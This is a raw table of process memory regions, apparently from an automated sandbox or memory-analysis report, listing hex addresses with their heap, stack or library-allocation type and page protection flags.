20000
|
heap
|
page read and write
|
||
5027000
|
heap
|
page read and write
|
||
4F02000
|
heap
|
page read and write
|
||
50FD000
|
heap
|
page read and write
|
||
3F5000
|
heap
|
page read and write
|
||
5073000
|
heap
|
page read and write
|
||
4E6C000
|
heap
|
page read and write
|
||
4E3A000
|
heap
|
page read and write
|
||
4F3B000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
5076000
|
heap
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
5040000
|
heap
|
page read and write
|
||
4B2B000
|
heap
|
page read and write
|
||
A2000
|
stack
|
page read and write
|
||
1D90000
|
direct allocation
|
page read and write
|
||
5035000
|
heap
|
page read and write
|
||
124BF000
|
trusted library allocation
|
page read and write
|
||
7FE8B530000
|
trusted library allocation
|
page read and write
|
||
505B000
|
heap
|
page read and write
|
||
1C37F000
|
heap
|
page read and write
|
||
4AF3000
|
heap
|
page read and write
|
||
1AF1F000
|
stack
|
page read and write
|
||
7FE8B6D0000
|
trusted library allocation
|
page read and write
|
||
3976000
|
trusted library allocation
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
34B000
|
heap
|
page read and write
|
||
3192000
|
trusted library allocation
|
page read and write
|
||
1ADE0000
|
heap
|
page read and write
|
||
4FE7000
|
heap
|
page read and write
|
||
4F33000
|
heap
|
page read and write
|
||
4F1E000
|
heap
|
page read and write
|
||
518C000
|
heap
|
page read and write
|
||
4980000
|
heap
|
page read and write
|
||
46C000
|
heap
|
page read and write
|
||
4E9000
|
heap
|
page read and write
|
||
4EF4000
|
heap
|
page read and write
|
||
50EA000
|
heap
|
page read and write
|
||
4EE3000
|
heap
|
page read and write
|
||
4F0B000
|
heap
|
page read and write
|
||
1E4000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
4FCE000
|
heap
|
page read and write
|
||
3AE000
|
heap
|
page read and write
|
||
379C000
|
heap
|
page read and write
|
||
50EF000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
1A4B0000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
54D0000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
50D8000
|
heap
|
page read and write
|
||
4DBA000
|
heap
|
page read and write
|
||
2BED000
|
trusted library allocation
|
page read and write
|
||
5199000
|
heap
|
page read and write
|
||
4E15000
|
heap
|
page read and write
|
||
4E0A000
|
heap
|
page read and write
|
||
4FD2000
|
heap
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
4F2E000
|
heap
|
page read and write
|
||
30A5000
|
trusted library allocation
|
page read and write
|
||
4D56000
|
heap
|
page read and write
|
||
4E4F000
|
heap
|
page read and write
|
||
4F2F000
|
heap
|
page read and write
|
||
7D5000
|
heap
|
page read and write
|
||
5032000
|
heap
|
page read and write
|
||
4B6F000
|
heap
|
page read and write
|
||
4E37000
|
heap
|
page read and write
|
||
4F8C000
|
heap
|
page read and write
|
||
4D55000
|
heap
|
page read and write
|
||
12B59000
|
trusted library allocation
|
page read and write
|
||
4E21000
|
heap
|
page read and write
|
||
502B000
|
heap
|
page read and write
|
||
4FA4000
|
heap
|
page read and write
|
||
41E000
|
heap
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
4DA0000
|
heap
|
page read and write
|
||
500C000
|
heap
|
page read and write
|
||
4D65000
|
heap
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
4FFB000
|
heap
|
page read and write
|
||
347000
|
heap
|
page read and write
|
||
4F99000
|
heap
|
page read and write
|
||
5194000
|
heap
|
page read and write
|
||
355000
|
heap
|
page read and write
|
||
3AA000
|
heap
|
page read and write
|
||
4E94000
|
heap
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
3A3000
|
heap
|
page read and write
|
||
40B0000
|
heap
|
page read and write
|
||
4F3000
|
heap
|
page read and write
|
||
4F86000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4D9A000
|
heap
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
5083000
|
heap
|
page read and write
|
||
4DD3000
|
heap
|
page read and write
|
||
516E000
|
heap
|
page read and write
|
||
30F0000
|
trusted library allocation
|
page execute
|
||
13190000
|
trusted library allocation
|
page read and write
|
||
394000
|
heap
|
page read and write
|
||
3F8E000
|
stack
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
50CB000
|
heap
|
page read and write
|
||
4E50000
|
heap
|
page read and write
|
||
4FF6000
|
heap
|
page read and write
|
||
31E000
|
heap
|
page read and write
|
||
4E2E000
|
heap
|
page read and write
|
||
50E3000
|
heap
|
page read and write
|
||
5198000
|
heap
|
page read and write
|
||
4E5C000
|
heap
|
page read and write
|
||
51A1000
|
heap
|
page read and write
|
||
4E35000
|
heap
|
page read and write
|
||
4DBB000
|
heap
|
page read and write
|
||
500A000
|
heap
|
page read and write
|
||
4E33000
|
heap
|
page read and write
|
||
5016000
|
heap
|
page read and write
|
||
50AD000
|
heap
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
5113000
|
heap
|
page read and write
|
||
312E000
|
trusted library allocation
|
page read and write
|
||
676000
|
heap
|
page read and write
|
||
7FE898BB000
|
trusted library allocation
|
page read and write
|
||
4FF6000
|
heap
|
page read and write
|
||
343000
|
heap
|
page read and write
|
||
5058000
|
heap
|
page read and write
|
||
3DD000
|
heap
|
page read and write
|
||
4D4E000
|
heap
|
page read and write
|
||
4B78000
|
heap
|
page read and write
|
||
349000
|
heap
|
page read and write
|
||
7FE89A53000
|
trusted library allocation
|
page read and write
|
||
4F12000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4D48000
|
heap
|
page read and write
|
||
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
358000
|
heap
|
page read and write
|
||
39B000
|
heap
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
4F11000
|
heap
|
page read and write
|
||
465E000
|
stack
|
page read and write
|
||
4E00000
|
heap
|
page read and write
|
||
33F000
|
heap
|
page read and write
|
||
5078000
|
heap
|
page read and write
|
||
43A000
|
heap
|
page read and write
|
||
1CEBF000
|
stack
|
page read and write
|
||
4E51000
|
heap
|
page read and write
|
||
502D000
|
heap
|
page read and write
|
||
4DCF000
|
heap
|
page read and write
|
||
13253000
|
trusted library allocation
|
page read and write
|
||
4F89000
|
heap
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
5039000
|
heap
|
page read and write
|
||
1B230000
|
heap
|
page read and write
|
||
1A69F000
|
stack
|
page read and write
|
||
5059000
|
heap
|
page read and write
|
||
4B48000
|
heap
|
page read and write
|
||
1C9DF000
|
stack
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
4FAE000
|
heap
|
page read and write
|
||
4E90000
|
heap
|
page read and write
|
||
50FB000
|
heap
|
page read and write
|
||
2D8B000
|
heap
|
page read and write
|
||
50B6000
|
heap
|
page read and write
|
||
4BA000
|
heap
|
page read and write
|
||
50AD000
|
heap
|
page read and write
|
||
5010000
|
heap
|
page read and write
|
||
33E000
|
heap
|
page read and write
|
||
3A6000
|
heap
|
page read and write
|
||
5054000
|
heap
|
page read and write
|
||
504D000
|
heap
|
page read and write
|
||
50DD000
|
heap
|
page read and write
|
||
504F000
|
heap
|
page read and write
|
||
1AAF8000
|
stack
|
page read and write
|
||
4F19000
|
heap
|
page read and write
|
||
4EE6000
|
heap
|
page read and write
|
||
33E000
|
heap
|
page read and write
|
||
50C7000
|
heap
|
page read and write
|
||
4E37000
|
heap
|
page read and write
|
||
4FD1000
|
heap
|
page read and write
|
||
4E23000
|
heap
|
page read and write
|
||
4DFE000
|
heap
|
page read and write
|
||
4D55000
|
heap
|
page read and write
|
||
3EB000
|
heap
|
page read and write
|
||
4E2A000
|
heap
|
page read and write
|
||
507D000
|
heap
|
page read and write
|
||
4FC8000
|
heap
|
page read and write
|
||
4E1B000
|
heap
|
page read and write
|
||
7FE89BE3000
|
trusted library allocation
|
page read and write
|
||
509D000
|
heap
|
page read and write
|
||
4FCD000
|
heap
|
page read and write
|
||
366000
|
heap
|
page read and write
|
||
4E21000
|
heap
|
page read and write
|
||
4FC5000
|
heap
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
4F1E000
|
heap
|
page read and write
|
||
4E8A000
|
heap
|
page read and write
|
||
4FFE000
|
heap
|
page read and write
|
||
5006000
|
heap
|
page read and write
|
||
4D8E000
|
heap
|
page read and write
|
||
50F8000
|
heap
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
1B64F000
|
stack
|
page read and write
|
||
4E5A000
|
heap
|
page read and write
|
||
7FE8B55D000
|
trusted library allocation
|
page execute and read and write
|
||
384000
|
heap
|
page read and write
|
||
5194000
|
heap
|
page read and write
|
||
4E46000
|
heap
|
page read and write
|
||
5057000
|
heap
|
page read and write
|
||
4E39000
|
heap
|
page read and write
|
||
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
1D30000
|
direct allocation
|
page read and write
|
||
34B000
|
heap
|
page read and write
|
||
4DF7000
|
heap
|
page read and write
|
||
518D000
|
heap
|
page read and write
|
||
504D000
|
heap
|
page read and write
|
||
200000
|
heap
|
page read and write
|
||
5029000
|
heap
|
page read and write
|
||
4FD9000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
4ECB000
|
heap
|
page read and write
|
||
5072000
|
heap
|
page read and write
|
||
7FE8995C000
|
trusted library allocation
|
page execute and read and write
|
||
1C270000
|
heap
|
page read and write
|
||
311000
|
heap
|
page read and write
|
||
4B7A000
|
heap
|
page read and write
|
||
4B78000
|
heap
|
page read and write
|
||
4ACD000
|
heap
|
page read and write
|
||
50E6000
|
heap
|
page read and write
|
||
7FE89C04000
|
trusted library allocation
|
page read and write
|
||
4FA9000
|
heap
|
page read and write
|
||
50D8000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
4E36000
|
heap
|
page read and write
|
||
4AEE000
|
heap
|
page read and write
|
||
1C600000
|
heap
|
page read and write
|
||
498B000
|
heap
|
page read and write
|
||
5094000
|
heap
|
page read and write
|
||
2F50000
|
remote allocation
|
page read and write
|
||
4FB4000
|
heap
|
page read and write
|
||
DE0000
|
trusted library allocation
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
4EE5000
|
heap
|
page read and write
|
||
5BC000
|
stack
|
page read and write
|
||
4E07000
|
heap
|
page read and write
|
||
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
4D71000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
4E1D000
|
heap
|
page read and write
|
||
5046000
|
heap
|
page read and write
|
||
4F83000
|
heap
|
page read and write
|
||
344000
|
heap
|
page read and write
|
||
5000000
|
heap
|
page read and write
|
||
4FFA000
|
heap
|
page read and write
|
||
4FDB000
|
heap
|
page read and write
|
||
1A809000
|
heap
|
page read and write
|
||
3784000
|
heap
|
page read and write
|
||
517D000
|
heap
|
page read and write
|
||
5088000
|
heap
|
page read and write
|
||
4DFC000
|
heap
|
page read and write
|
||
502A000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
4DBF000
|
heap
|
page read and write
|
||
519F000
|
heap
|
page read and write
|
||
500A000
|
heap
|
page read and write
|
||
F0000
|
heap
|
page read and write
|
||
4E41000
|
heap
|
page read and write
|
||
318000
|
stack
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
1C26F000
|
stack
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
4B6F000
|
heap
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
346000
|
heap
|
page read and write
|
||
50B5000
|
heap
|
page read and write
|
||
454000
|
heap
|
page read and write
|
||
357000
|
heap
|
page read and write
|
||
4F03000
|
heap
|
page read and write
|
||
4DF6000
|
heap
|
page read and write
|
||
395000
|
heap
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
4D46000
|
heap
|
page read and write
|
||
12E000
|
heap
|
page read and write
|
||
4F0C000
|
heap
|
page read and write
|
||
1C18B000
|
heap
|
page read and write
|
||
4FCE000
|
heap
|
page read and write
|
||
503A000
|
heap
|
page read and write
|
||
360000
|
direct allocation
|
page read and write
|
||
4FDC000
|
heap
|
page read and write
|
||
4E1F000
|
heap
|
page read and write
|
||
4E4F000
|
heap
|
page read and write
|
||
506A000
|
heap
|
page read and write
|
||
50BF000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4FF9000
|
heap
|
page read and write
|
||
4E5A000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
4D9E000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
4D6A000
|
heap
|
page read and write
|
||
4E76000
|
heap
|
page read and write
|
||
5087000
|
heap
|
page read and write
|
||
4D70000
|
heap
|
page read and write
|
||
5115000
|
heap
|
page read and write
|
||
4E58000
|
heap
|
page read and write
|
||
4D9F000
|
heap
|
page read and write
|
||
5066000
|
heap
|
page read and write
|
||
4F65000
|
heap
|
page read and write
|
||
5000000
|
heap
|
page read and write
|
||
3AE000
|
heap
|
page read and write
|
||
35F0000
|
trusted library allocation
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
7FE8B6DA000
|
trusted library allocation
|
page read and write
|
||
506F000
|
heap
|
page read and write
|
||
51AE000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
355000
|
heap
|
page read and write
|
||
502B000
|
heap
|
page read and write
|
||
4FF1000
|
heap
|
page read and write
|
||
3A40000
|
trusted library allocation
|
page read and write
|
||
4DC8000
|
heap
|
page read and write
|
||
4CE000
|
heap
|
page read and write
|
||
4DF6000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
4DF8000
|
heap
|
page read and write
|
||
399000
|
heap
|
page read and write
|
||
4A04000
|
heap
|
page read and write
|
||
4DAD000
|
heap
|
page read and write
|
||
1A7EF000
|
heap
|
page read and write
|
||
4B2B000
|
heap
|
page read and write
|
||
512E000
|
heap
|
page read and write
|
||
12C000
|
heap
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
4E15000
|
heap
|
page read and write
|
||
36FD000
|
heap
|
page read and write
|
||
3F9000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
379D000
|
heap
|
page read and write
|
||
4EC5000
|
heap
|
page read and write
|
||
4E89000
|
heap
|
page read and write
|
||
40B0000
|
heap
|
page read and write
|
||
36A000
|
heap
|
page read and write
|
||
372000
|
heap
|
page read and write
|
||
4EE2000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
4B48000
|
heap
|
page read and write
|
||
1B1D0000
|
heap
|
page read and write
|
||
4E45000
|
heap
|
page read and write
|
||
389E000
|
stack
|
page read and write
|
||
4F9E000
|
heap
|
page read and write
|
||
4D74000
|
heap
|
page read and write
|
||
4F7E000
|
heap
|
page read and write
|
||
4D51000
|
heap
|
page read and write
|
||
4EC7000
|
heap
|
page read and write
|
||
35EA000
|
stack
|
page read and write
|
||
4F7A000
|
heap
|
page read and write
|
||
12616000
|
trusted library allocation
|
page read and write
|
||
4DD3000
|
heap
|
page read and write
|
||
502A000
|
heap
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
29D3000
|
trusted library allocation
|
page read and write
|
||
4E18000
|
heap
|
page read and write
|
||
4E42000
|
heap
|
page read and write
|
||
3718000
|
heap
|
page read and write
|
||
1C08D000
|
stack
|
page read and write
|
||
5000000
|
heap
|
page read and write
|
||
44A000
|
heap
|
page read and write
|
||
5043000
|
heap
|
page read and write
|
||
4FF1000
|
heap
|
page read and write
|
||
5034000
|
heap
|
page read and write
|
||
4D55000
|
heap
|
page read and write
|
||
4DF7000
|
heap
|
page read and write
|
||
37E000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
512B000
|
heap
|
page read and write
|
||
36FD000
|
heap
|
page read and write
|
||
4FC3000
|
heap
|
page read and write
|
||
7FE8B616000
|
trusted library allocation
|
page execute and read and write
|
||
4E51000
|
heap
|
page read and write
|
||
4EBB000
|
heap
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
38B000
|
heap
|
page read and write
|
||
4E9B000
|
heap
|
page read and write
|
||
4ED2000
|
heap
|
page read and write
|
||
4D82000
|
heap
|
page read and write
|
||
4B76000
|
heap
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
51A2000
|
heap
|
page read and write
|
||
4F90000
|
heap
|
page read and write
|
||
34A000
|
heap
|
page read and write
|
||
5023000
|
heap
|
page read and write
|
||
4E79000
|
heap
|
page read and write
|
||
7FE89BBD000
|
trusted library allocation
|
page read and write
|
||
36A000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
50CC000
|
heap
|
page read and write
|
||
4DFB000
|
heap
|
page read and write
|
||
4D5F000
|
heap
|
page read and write
|
||
3E6A000
|
trusted library allocation
|
page read and write
|
||
4E84000
|
heap
|
page read and write
|
||
43A000
|
heap
|
page read and write
|
||
4EF0000
|
heap
|
page read and write
|
||
4D9F000
|
heap
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
4B7A000
|
heap
|
page read and write
|
||
5114000
|
heap
|
page read and write
|
||
5016000
|
heap
|
page read and write
|
||
38C000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
4ED6000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4D89000
|
heap
|
page read and write
|
||
4B75000
|
heap
|
page read and write
|
||
1C2BD000
|
heap
|
page read and write
|
||
4FA1000
|
heap
|
page read and write
|
||
16D000
|
stack
|
page read and write
|
||
4FFE000
|
heap
|
page read and write
|
||
382000
|
heap
|
page read and write
|
||
4B43000
|
heap
|
page read and write
|
||
7FE8B53D000
|
trusted library allocation
|
page execute and read and write
|
||
12F41000
|
trusted library allocation
|
page read and write
|
||
4E2A000
|
heap
|
page read and write
|
||
4DCD000
|
heap
|
page read and write
|
||
353000
|
heap
|
page read and write
|
||
339000
|
heap
|
page read and write
|
||
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
50AD000
|
heap
|
page read and write
|
||
1A7A0000
|
heap
|
page read and write
|
||
4D80000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
51AE000
|
heap
|
page read and write
|
||
4DC9000
|
heap
|
page read and write
|
||
230000
|
heap
|
page read and write
|
||
4D9E000
|
heap
|
page read and write
|
||
4FCB000
|
heap
|
page read and write
|
||
308F000
|
stack
|
page read and write
|
||
43A000
|
heap
|
page read and write
|
||
4E78000
|
heap
|
page read and write
|
||
4FC1000
|
heap
|
page read and write
|
||
4EC1000
|
heap
|
page read and write
|
||
4D4F000
|
heap
|
page read and write
|
||
4E72000
|
heap
|
page read and write
|
||
502B000
|
heap
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
4E00000
|
heap
|
page read and write
|
||
5076000
|
heap
|
page read and write
|
||
4D85000
|
heap
|
page read and write
|
||
4E0C000
|
heap
|
page read and write
|
||
4ECB000
|
heap
|
page read and write
|
||
4F89000
|
heap
|
page read and write
|
||
4E9B000
|
heap
|
page read and write
|
||
1A969000
|
stack
|
page read and write
|
||
5116000
|
heap
|
page read and write
|
||
4B78000
|
heap
|
page read and write
|
||
28E000
|
heap
|
page read and write
|
||
50CE000
|
heap
|
page read and write
|
||
51A1000
|
heap
|
page read and write
|
||
4F7A000
|
heap
|
page read and write
|
||
4F98000
|
heap
|
page read and write
|
||
4D90000
|
heap
|
page read and write
|
||
4FEF000
|
heap
|
page read and write
|
||
30AF000
|
trusted library allocation
|
page read and write
|
||
4DB8000
|
heap
|
page read and write
|
||
4D7B000
|
heap
|
page read and write
|
||
50CC000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
4FDB000
|
heap
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
33E000
|
heap
|
page read and write
|
||
4E45000
|
heap
|
page read and write
|
||
4FFE000
|
heap
|
page read and write
|
||
4EA2000
|
heap
|
page read and write
|
||
3799000
|
heap
|
page read and write
|
||
4D4D000
|
heap
|
page read and write
|
||
4D49000
|
heap
|
page read and write
|
||
4E62000
|
heap
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
4DFB000
|
heap
|
page read and write
|
||
4B45000
|
heap
|
page read and write
|
||
1B520000
|
heap
|
page execute and read and write
|
||
5078000
|
heap
|
page read and write
|
||
380000
|
heap
|
page read and write
|
||
4EC0000
|
heap
|
page read and write
|
||
352000
|
heap
|
page read and write
|
||
4D5E000
|
heap
|
page read and write
|
||
4E6D000
|
heap
|
page read and write
|
||
5071000
|
heap
|
page read and write
|
||
4981000
|
heap
|
page read and write
|
||
4D9B000
|
heap
|
page read and write
|
||
4D51000
|
heap
|
page read and write
|
||
3724000
|
heap
|
page read and write
|
||
4A01000
|
heap
|
page read and write
|
||
517F000
|
heap
|
page read and write
|
||
49B000
|
heap
|
page read and write
|
||
4FFA000
|
heap
|
page read and write
|
||
5078000
|
heap
|
page read and write
|
||
516E000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
3EB0000
|
heap
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
395000
|
heap
|
page read and write
|
||
5194000
|
heap
|
page read and write
|
||
4B48000
|
heap
|
page read and write
|
||
4DA000
|
heap
|
page read and write
|
||
4EDE000
|
heap
|
page read and write
|
||
2F6D000
|
trusted library allocation
|
page read and write
|
||
23FA000
|
stack
|
page read and write
|
||
4FC8000
|
heap
|
page read and write
|
||
4F2D000
|
heap
|
page read and write
|
||
1C10C000
|
stack
|
page read and write
|
||
4DE4000
|
heap
|
page read and write
|
||
510F000
|
heap
|
page read and write
|
||
7FE8B5F0000
|
trusted library allocation
|
page execute and read and write
|
||
4E56000
|
heap
|
page read and write
|
||
4DED000
|
heap
|
page read and write
|
||
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
1F9000
|
heap
|
page read and write
|
||
4FEC000
|
heap
|
page read and write
|
||
5116000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
508C000
|
heap
|
page read and write
|
||
36A000
|
heap
|
page read and write
|
||
39F000
|
heap
|
page read and write
|
||
34B000
|
heap
|
page read and write
|
||
1C0000
|
trusted library allocation
|
page read and write
|
||
356000
|
heap
|
page read and write
|
||
394000
|
heap
|
page read and write
|
||
26C000
|
stack
|
page read and write
|
||
4B78000
|
heap
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
4FF5000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
5054000
|
heap
|
page read and write
|
||
4A01000
|
heap
|
page read and write
|
||
4DA8000
|
heap
|
page read and write
|
||
4E5B000
|
heap
|
page read and write
|
||
4E43000
|
heap
|
page read and write
|
||
3725000
|
heap
|
page read and write
|
||
4D8A000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
36B3000
|
heap
|
page read and write
|
||
4FD1000
|
heap
|
page read and write
|
||
508F000
|
heap
|
page read and write
|
||
51A7000
|
heap
|
page read and write
|
||
3D70000
|
heap
|
page read and write
|
||
11CE000
|
unkown
|
page readonly
|
||
4DD3000
|
heap
|
page read and write
|
||
4F2F000
|
heap
|
page read and write
|
||
349000
|
heap
|
page read and write
|
||
3796000
|
heap
|
page read and write
|
||
504B000
|
heap
|
page read and write
|
||
4FA0000
|
heap
|
page read and write
|
||
5083000
|
heap
|
page read and write
|
||
4D68000
|
heap
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
50CC000
|
heap
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
1B0BF000
|
stack
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
4ED8000
|
heap
|
page read and write
|
||
4DF3000
|
heap
|
page read and write
|
||
50AB000
|
heap
|
page read and write
|
||
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
5032000
|
heap
|
page read and write
|
||
BD0000
|
direct allocation
|
page execute and read and write
|
||
503D000
|
heap
|
page read and write
|
||
3A3000
|
heap
|
page read and write
|
||
4660000
|
trusted library allocation
|
page read and write
|
||
4D83000
|
heap
|
page read and write
|
||
2F6B000
|
trusted library allocation
|
page read and write
|
||
4B50000
|
heap
|
page read and write
|
||
25000
|
heap
|
page read and write
|
||
382000
|
heap
|
page read and write
|
||
1FB3000
|
direct allocation
|
page read and write
|
||
4E01000
|
heap
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
5172000
|
heap
|
page read and write
|
||
124E1000
|
trusted library allocation
|
page read and write
|
||
4F7000
|
heap
|
page read and write
|
||
3EB000
|
heap
|
page read and write
|
||
50F6000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
4E8F000
|
heap
|
page read and write
|
||
393000
|
heap
|
page read and write
|
||
3738000
|
heap
|
page read and write
|
||
4F90000
|
heap
|
page read and write
|
||
339000
|
heap
|
page read and write
|
||
4EFB000
|
heap
|
page read and write
|
||
4FE0000
|
heap
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
387000
|
heap
|
page read and write
|
||
FD000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
3DB000
|
heap
|
page read and write
|
||
53B0000
|
heap
|
page read and write
|
||
4E4D000
|
heap
|
page read and write
|
||
50CE000
|
heap
|
page read and write
|
||
50E1000
|
heap
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
36A0000
|
heap
|
page read and write
|
||
4EEE000
|
heap
|
page read and write
|
||
361000
|
heap
|
page read and write
|
||
394000
|
heap
|
page read and write
|
||
50CB000
|
heap
|
page read and write
|
||
5054000
|
heap
|
page read and write
|
||
C0000
|
heap
|
page read and write
|
||
4DF7000
|
heap
|
page read and write
|
||
4D74000
|
heap
|
page read and write
|
||
50AB000
|
heap
|
page read and write
|
||
4E67000
|
heap
|
page read and write
|
||
4AF0000
|
heap
|
page read and write
|
||
504D000
|
heap
|
page read and write
|
||
4E87000
|
heap
|
page read and write
|
||
4E2A000
|
heap
|
page read and write
|
||
50B1000
|
heap
|
page read and write
|
||
4E01000
|
heap
|
page read and write
|
||
3098000
|
trusted library allocation
|
page read and write
|
||
4B2B000
|
heap
|
page read and write
|
||
4E6A000
|
heap
|
page read and write
|
||
4E9A000
|
heap
|
page read and write
|
||
4DFC000
|
heap
|
page read and write
|
||
50C4000
|
heap
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
5048000
|
heap
|
page read and write
|
||
4FAC000
|
heap
|
page read and write
|
||
5196000
|
heap
|
page read and write
|
||
517D000
|
heap
|
page read and write
|
||
4DF2000
|
heap
|
page read and write
|
||
4B7A000
|
heap
|
page read and write
|
||
1C16000
|
heap
|
page read and write
|
||
4E2B000
|
heap
|
page read and write
|
||
4FD9000
|
heap
|
page read and write
|
||
506A000
|
heap
|
page read and write
|
||
4E96000
|
heap
|
page read and write
|
||
506D000
|
heap
|
page read and write
|
||
4F8F000
|
heap
|
page read and write
|
||
1AF4E000
|
stack
|
page read and write
|
||
3BF000
|
direct allocation
|
page read and write
|
||
46B000
|
heap
|
page read and write
|
||
4D64000
|
heap
|
page read and write
|
||
7FE89AA8000
|
trusted library allocation
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
4FE2000
|
heap
|
page read and write
|
||
4DCF000
|
heap
|
page read and write
|
||
4F93000
|
heap
|
page read and write
|
||
4EFB000
|
heap
|
page read and write
|
||
5077000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4FC0000
|
heap
|
page read and write
|
||
4D84000
|
heap
|
page read and write
|
||
4FC9000
|
heap
|
page read and write
|
||
1A87E000
|
heap
|
page execute and read and write
|
||
4F1F000
|
heap
|
page read and write
|
||
50FC000
|
heap
|
page read and write
|
||
4B51000
|
heap
|
page read and write
|
||
4AF7000
|
heap
|
page read and write
|
||
4E00000
|
heap
|
page read and write
|
||
4EF4000
|
heap
|
page read and write
|
||
5110000
|
heap
|
page read and write
|
||
4F15000
|
heap
|
page read and write
|
||
4F01000
|
heap
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
43A000
|
heap
|
page read and write
|
||
50EC000
|
heap
|
page read and write
|
||
4EBF000
|
heap
|
page read and write
|
||
505B000
|
heap
|
page read and write
|
||
4F83000
|
heap
|
page read and write
|
||
4E2B000
|
heap
|
page read and write
|
||
1B580000
|
heap
|
page read and write
|
||
4E2E000
|
heap
|
page read and write
|
||
3F6000
|
heap
|
page read and write
|
||
4EFF000
|
heap
|
page read and write
|
||
50C6000
|
heap
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
4DE3000
|
heap
|
page read and write
|
||
378B000
|
heap
|
page read and write
|
||
4E73000
|
heap
|
page read and write
|
||
5007000
|
heap
|
page read and write
|
||
4E32000
|
heap
|
page read and write
|
||
4ED4000
|
heap
|
page read and write
|
||
4FCF000
|
heap
|
page read and write
|
||
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
1C51E000
|
stack
|
page read and write
|
||
503E000
|
heap
|
page read and write
|
||
506D000
|
